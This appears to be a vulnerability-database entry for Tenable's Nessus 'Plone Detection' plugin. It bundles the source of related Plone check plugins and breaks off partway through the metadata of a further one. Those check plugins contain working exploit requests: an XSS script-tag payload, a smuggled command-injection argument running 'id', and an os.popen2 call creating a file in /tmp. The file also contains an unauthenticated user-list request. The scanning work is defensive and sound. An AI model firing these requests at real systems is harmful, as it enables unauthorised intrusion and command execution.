ID PLONE_DETECT.NASL Type nessus Reporter This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
The remote host is running Plone, a free content management system
written in Python.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
  # Plugin identity and revision.
  script_id(53545);
  script_version("1.7");
  script_cvs_date("Date: 2019/11/22");

  script_name(english:"Plone Detection");
  script_summary(english:"Checks for presence of Plone.");

  # Text shown in the report. This is an inventory check, so it carries
  # no risk rating and no remediation advice.
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a content management system written in
Python."
  );
  script_set_attribute(attribute:"description", value:
"The remote host is running Plone, a free content management system
written in Python."
  );
  script_set_attribute(attribute:"see_also", value:"https://plone.org/");
  script_set_attribute(attribute:"solution", value:"n/a");
  script_set_attribute(attribute:"risk_factor", value:"None");
  script_set_attribute(attribute:"plugin_publication_date", value:"2011/04/25");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:plone:plone");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"asset_inventory", value:"True");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Run only after the web server has been fingerprinted, skip when CGI
  # scanning is disabled, and default to the standard HTTP port.
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
# Zope itself listens on 8080 by default, but the usual deployment puts a
# front-end web server in front of it that proxies selected paths, so
# probing the HTTP port catches the majority of installs.
port = get_http_port(default:80);

# Candidate directories: the server's known CGI directories, extended with
# the common Plone mount points when "Perform thorough tests" is enabled.
dirs = make_list(cgi_dirs());
if (thorough_tests)
  dirs = list_uniq(make_list("/plone", "/Plone", "/blog", "/cms", dirs));
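# Probe each candidate directory for a Plone front page.
installs = NULL;
foreach dir (dirs)
{
  # Fetch the directory index; a transport failure aborts the plugin.
  res = http_send_recv3(
    method       : "GET",
    item         : dir + "/",
    port         : port,
    exit_on_fail : TRUE
  );

  # Look for Plone's generator tag. Only the prefix is compared: the text
  # after "Plone" is a link, not part of the product identity, and
  # plone_membershiptool_access_control_bypass.nasl keys on this same
  # prefix, so matching the full string here left installs that the
  # sibling plugin recognises undetected by the detector they depend on.
  if ('<meta name="generator" content="Plone' >!< res[2])
    continue;

  # Recover the site's own path from its login link so that a page that
  # was proxied or redirected from elsewhere is not attributed to this dir.
  matches = eregmatch(string:res[2], pattern:'<a href="(?:https?://)?[^/]*(.*)/login(_form)?"');
  if (isnull(matches)) continue;

  # The canonical path must be the directory under test.
  if (dir != matches[1]) continue;

  # The front page carries nothing that reliably identifies the release.
  version = UNKNOWN_VER;

  installs = add_install(
    appname  : "plone",
    installs : installs,
    port     : port,
    dir      : dir,
    ver      : version,
    cpe      : "cpe:/a:plone:plone"
  );

  # Keep looking for further installs only when "Perform thorough tests" is set.
  if (!thorough_tests) break;
}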
# No directory matched: leave an explicit reason rather than exiting silently.
if (isnull(installs)) exit(0, "Plone was not detected on the remote host.");

# Emit the finding; the per-directory listing is attached only when the
# scan is configured for verbose reports.
if (report_verbosity > 0)
{
  security_note(
    port  : port,
    extra : get_install_report(port:port, installs:installs, display_name:"Plone")
  );
}
else security_note(port);
{"id": "PLONE_DETECT.NASL", "bulletinFamily": "scanner", "title": "Plone Detection", "description": "The remote host is running Plone, a free content management system\nwritten in Python.", "published": "2011-04-25T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/nessus/53545", "reporter": "This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://plone.org/"], "cvelist": [], "type": "nessus", "lastseen": "2021-01-01T04:55:03", "edition": 22, "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["PLONE_20130618.NASL", "PLONE_MEMBERSHIPTOOL_ACCESS_CONTROL_BYPASS.NASL", "PLONE_PLONEFORMGEN_CODE_EXECUTION.NASL", "PLONE_20110928.NASL", "PLONE_AUTHENTICATION_BYPASS.NASL"]}], "modified": "2021-01-01T04:55:03", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-01-01T04:55:03", "rev": 2}, "vulnersScore": -0.3}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53545);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_name(english:\"Plone Detection\");\n script_summary(english:\"Checks for presence of Plone.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a content management system written in\nPython.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is running Plone, a free content management system\nwritten in Python.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://plone.org/\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/25\");\n\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"asset_inventory\", value:\"True\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# By default, Zope serves on port 8080. However, most web servers are\n# set up to proxy requests for certain directories to Zope, so we can\n# just check port 80 and expect to catch most of them.\nport = get_http_port(default:80);\n\n# Put together a list of directories to search through.\nif (thorough_tests)\n dirs = list_uniq(make_list(\"/plone\", \"/Plone\", \"/blog\", \"/cms\", cgi_dirs()));\nelse\n dirs = make_list(cgi_dirs());\n\n# Search for Plone.\ninstalls = NULL;\nforeach dir (dirs)\n{\n # Try to access page.\n res = http_send_recv3(\n method : \"GET\",\n item : dir + \"/\",\n port : port,\n exit_on_fail : TRUE\n );\n\n # Check the generator tag.\n if ('<meta name=\"generator\" content=\"Plone - http://plone.org\" />' >!< res[2])\n continue;\n\n # Parse path from URL.\n matches = eregmatch(string:res[2], pattern:'<a href=\"(?:https?://)?[^/]*(.*)/login(_form)?\"');\n if (isnull(matches)) continue;\n\n # Ensure the canonical URL matches the directory we're currently\n # checking.\n if (dir != matches[1]) continue;\n\n # There is no good way to detect the version of Plone that is\n # running based on the web page itself.\n version = UNKNOWN_VER;\n\n installs = add_install(\n appname : \"plone\",\n installs : installs,\n port : port,\n dir : dir,\n 
ver : version,\n cpe : \"cpe:/a:plone:plone\"\n );\n\n # Scan for multiple installations only if the \"Perform thorough tests\" setting is checked.\n if (!thorough_tests) break;\n}\n\nif (isnull(installs)) exit(0, \"Plone was not detected on the remote host.\");\n\n# Report findings.\nif (report_verbosity > 0)\n{\n report = get_install_report(\n port : port,\n installs : installs,\n display_name : \"Plone\"\n );\n security_note(port:port, extra:report);\n}\nelse security_note(port);\n", "naslFamily": "CGI abuses", "pluginID": "53545", "cpe": ["cpe:/a:plone:plone"], "scheme": null}
{"nessus": [{"lastseen": "2021-01-01T04:55:03", "description": "The version of Plone installed on the remote web server is affected \nby a cross-site scripting vulnerability because it fails to properly\nsanitize input to the 'mailaddress' parameter of the 'spamProtect.py'\nscript. An attacker may be able to leverage this to inject arbitrary\nHTML and script code into a user's browser to be executed within the\nsecurity context of the affected site. \n\nNote that the application is also reportedly affected by several \nadditional vulnerabilities. Some of the reported vulnerabilities\ninclude but are not limited to arbitrary code execution, privilege \nescalation, denial of service (DoS), open redirect, cross-site \nscripting, as well as several additional flaws; however, Nessus has \nnot tested for the additional issues.", "edition": 25, "published": "2013-07-08T00:00:00", "title": "Plone spamProtect mailaddress Parameter XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4190"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_20130618.NASL", "href": "https://www.tenable.com/plugins/nessus/67205", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67205);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n \n script_cve_id(\"CVE-2013-4190\");\n script_bugtraq_id(60339, 61953);\n\n script_name(english:\"Plone spamProtect mailaddress Parameter XSS\");\n script_summary(english:\"Attempts a non-persistent XSS\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a Python script that is affected by a\ncross-site scripting vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Plone installed on the remote web server is affected \nby a cross-site scripting vulnerability because it fails to properly\nsanitize input to the 
'mailaddress' parameter of the 'spamProtect.py'\nscript. An attacker may be able to leverage this to inject arbitrary\nHTML and script code into a user's browser to be executed within the\nsecurity context of the affected site. \n\nNote that the application is also reportedly affected by several \nadditional vulnerabilities. Some of the reported vulnerabilities\ninclude but are not limited to arbitrary code execution, privilege \nescalation, denial of service (DoS), open redirect, cross-site \nscripting, as well as several additional flaws; however, Nessus has \nnot tested for the additional issues.\"\n );\n # https://plone.org/products/plone/security/advisories/20130618-announcement\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?05118bde\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/oss-sec/2013/q3/258\");\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone-hotfix/releases/20130618\");\n script_set_attribute(attribute:\"solution\", value:\n\"Follow the instructions in the advisory to apply the hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n 
script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"plone_detect.nasl\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname : \"plone\",\n port : port,\n exit_on_fail : TRUE\n);\n\ndir = install[\"dir\"];\nxss_test = \"><script>alert('\" + (SCRIPT_NAME - \".nasl\") + \"-\" + unixtime() +\n \"')</script>\";\n\nexploit = test_cgi_xss(\n port : port,\n dirs : make_list(dir),\n cgi : '/spamProtect',\n qs : 'mailaddress=' + urlencode(str:xss_test),\n pass_str : 'mailto:' + xss_test,\n pass_re : \"<a href=\"\n);\n\nif (!exploit)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Plone\", build_url(qs:dir, port:port));\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-01T04:55:03", "description": "The version of PloneFormGen, an add-on for Plone, installed on the\nremote web server contains a flaw that allows arbitrary code execution. 
\nUsing a specially crafted URL, this can allow an unauthenticated, remote\nattacker the ability to run arbitrary commands on the system subject to\nthe privileges of the web server user.", "edition": 25, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2013-06-11T00:00:00", "title": "Plone PloneFormGen Unspecified Arbitrary Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": [], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_PLONEFORMGEN_CODE_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66862", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66862);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_bugtraq_id(60247);\n\n script_name(english:\"Plone PloneFormGen Unspecified Arbitrary Code Execution\");\n script_summary(english:\"Tries to execute arbitrary code\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a Python script that is affected by a\nremote code execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of PloneFormGen, an add-on for Plone, installed on the\nremote web server contains a flaw that allows arbitrary code execution. 
\nUsing a specially crafted URL, this can allow an unauthenticated, remote\nattacker the ability to run arbitrary commands on the system subject to\nthe privileges of the web server user.\"\n );\n # http://plone.org/products/plone/security/advisories/ploneformgen-vulnerability-requires-immediate-upgrade\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3e7f0ef9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://pypi.org/project/Products.PloneFormGen/1.7.11/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.7.11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"plone_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname : \"plone\",\n port : port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\ninstall_url = build_url(qs:dir, port:port);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig%20/all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig%20/all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig%20/all'] = \"Subnet Mask\";\n\nforeach cmd (cmds)\n{\n url = '@@gpg_services/encrypt?data=&recipient_key_id=%26' + cmd;\n\n res = http_send_recv3(\n method : \"GET\",\n item : dir + \"/\" + url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (egrep(pattern:cmd_pats[cmd], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + install_url + '/' + url +\n '\\n' +\n '\\n';\n if (report_verbosity > 1)\n {\n report +=\n '\\nNessus executed the command : \"'+cmd+'\" which produced the' +\n '\\nfollowing output :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + data_protection::sanitize_uid(output:chomp(res[2])) +\n '\\n' + snip +\n '\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n}\naudit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, \"Plone\", install_url, \"PloneFormGen add-on\");\n", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:55:03", "description": "The version of Plone hosted on the remote web server has a flaw that\nallows arbitrary access to Python modules. Using a specially crafted\nURL, this can allow an unauthenticated, remote attacker the ability to\nrun arbitrary commands on the system through the Python 'os' module in\nthe context of the 'Zope/Plone' service.", "edition": 26, "published": "2011-12-20T00:00:00", "title": "Plone Request Parsing Remote Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3587"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_20110928.NASL", "href": "https://www.tenable.com/plugins/nessus/57350", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57350);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2011-3587\");\n script_bugtraq_id(49857);\n\n script_name(english:\"Plone Request Parsing Remote Command Execution\");\n script_summary(english:\"Tries to execute a command.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A web application on the remote host allows arbitrary remote code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Plone hosted on the remote web server has a flaw that\nallows arbitrary access to Python modules. 
Using a specially crafted\nURL, this can allow an unauthenticated, remote attacker the ability to\nrun arbitrary commands on the system through the Python 'os' module in\nthe context of the 'Zope/Plone' service.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone/security/advisories/20110928\");\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone-hotfix/releases/20110928\");\n # http://zope2.zope.org/news/security-vulnerability-announcement-cve-2011-3587\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b32a0de5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://pypi.org/project/Products.PloneHotfix20110928/1.0/\");\n script_set_attribute(attribute:\"solution\", value:\"Follow the instructions in the advisory to apply the hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Plone RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Plone and Zope XMLTools Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2011/12/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"plone_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\n# Get details of Plone install.\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(appname:\"plone\", port:port, exit_on_fail:TRUE);\ndir = install[\"dir\"];\n\n# Verify the vuln exists (regardless of whether we can exploit it)\nos_module = \"p_/webdav/xmltools/minidom/xml/sax/saxutils/os\";\nurl = dir + \"/\" + os_module;\n\nres = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n);\n\nif (\"<module 'os' from '\" >!< res[2])\n exit(0, \"The Plone installation at \" + build_url(port:port, qs:dir) + \" is not affected.\");\n\n# it looks like only Unix Systems have popen2 compiled in,\n# so this shouldn't work on Windows - but we can try anyways\nfile_name = SCRIPT_NAME + \"-\" + unixtime();\nunix_command = urlencode(str:\"touch /tmp/\"+ file_name);\nwindows_command = urlencode(str:\"echo \" + SCRIPT_NAME + \" > %windir%/temp/\"+file_name);\n\nverify_instructions =\n'An attempt was made to create a temporary file on the remote host.\\n'+\n'You can verify its existence by checking for it at the following\\n'+\n'path';\n\nos = get_kb_item(\"Host/OS\");\nif (os && 
report_paranoia < 2)\n{\n if (\"Windows\" >< os)\n {\n commands = make_list(unix_command, windows_command);\n verify_instructions += 's:\\n\\n';\n verify_instructions += ' C:\\\\Windows\\\\temp\\\\' + file_name + '\\n';\n verify_instructions += ' C:\\\\Winnt\\\\temp\\\\' + file_name + '\\n';\n }\n else\n {\n commands = make_list(unix_command);\n verify_instructions += ':\\n\\n';\n verify_instructions += ' /tmp/' + file_name + '\\n';\n }\n}\nelse {\n commands = make_list(unix_command, windows_command);\n verify_instructions += 's (dependent on host operating system):\\n\\n';\n verify_instructions += ' /tmp/' + file_name + '\\n';\n verify_instructions += ' C:\\\\Windows\\\\temp\\\\' + file_name + '\\n';\n verify_instructions += ' C:\\\\Winnt\\\\temp\\\\' + file_name + '\\n';\n}\n\ncommand_success = FALSE;\nurl_list = make_list();\n\nforeach command (commands)\n{\n url = dir + \"/\" + os_module + \"/popen2?cmd=\" + command;\n url_list = make_list(url_list, url);\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (\"<open file '<fdopen>'\" >< res[2]) command_success = TRUE;\n}\n\nif (report_verbosity > 0)\n{\n if (command_success)\n {\n report = '\\nNessus was allowed to execute commands on the remote host.\\n' +\n 'The following requests were made:\\n\\n';\n foreach url (url_list)\n report += ' ' + build_url(qs:url, port:port) + '\\n';\n report += '\\n' + verify_instructions;\n }\n else\n {\n report = '\\nNessus was able to determine that the vulnerability exists on the\\n' +\n 'remote host, but was not able to successfully exploit it.\\n';\n }\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:55:03", "description": "The version of Plone on the remote host fails to require\nauthentication to access several sensitive functions.\n\nPlone is built on top of Zope, which maps Python objects and 
their\nmethods to URLs. Methods can have security restrictions, such as\nrequiring a login account or a specific privilege level, applied to\nthem to limit access. The installed version of Plone permits access\nto several methods that allow the adding, deleting, and changing\ncontent and users.", "edition": 25, "published": "2011-04-25T00:00:00", "title": "Plone Security Bypass", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0720"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_AUTHENTICATION_BYPASS.NASL", "href": "https://www.tenable.com/plugins/nessus/53546", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53546);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2011-0720\");\n script_bugtraq_id(46102);\n script_xref(name:\"Secunia\", value:\"43146\");\n\n script_name(english:\"Plone Security Bypass\");\n script_summary(english:\"Tries to access privileged object methods\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server has an application that that is affected by a\nsecurity bypass vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Plone on the remote host fails to require\nauthentication to access several sensitive functions.\n\nPlone is built on top of Zope, which maps Python objects and their\nmethods to URLs. Methods can have security restrictions, such as\nrequiring a login account or a specific privilege level, applied to\nthem to limit access. 
The installed version of Plone permits access\nto several methods that allow the adding, deleting, and changing\ncontent and users.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone/security/advisories/cve-2011-0720\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/fulldisclosure/2011/Apr/293\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply Plone Hotfix CVE-2011-0720.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/25\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"plone_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\n\n# Get details of Plone install.\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:\"plone\", port:port, exit_on_fail:TRUE);\ndir = install[\"dir\"];\n\n# Try to access a 
method that should be restricted to privileged, authenticated,\n# users.\nobject = \"acl_users\";\nmethod = \"getUsers\";\nurl = dir + \"/\" + object + \"/\" + method;\nres = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n);\n\n# If it's not a Python list, then we can assume it didn't work.\nif (!ereg(string:res[2], pattern:\"^\\[.*\\]$\"))\n exit(0, \"The Plone installation at \" + build_url(port:port, qs:dir) + \" is not affected.\");\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus was able to exploit the issue using the following request :' +\n '\\n' +\n '\\n ' + build_url(port:port, qs:url) +\n '\\n';\n\n if (report_verbosity > 1)\n report +=\n '\\nIt produced the following response :' +\n '\\n' +\n '\\n ' + res[2];\n\n security_hole(port:port, extra:report + '\\n');\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:55:03", "description": "The remote host is running Plone, an open source content manage system\nwritten in Python.\n\nThe version of Plone installed on the remote host does not limit\naccess to the 'changeMemberPortrait' and 'deletePersonalPortrait'\nMembershipTool methods. 
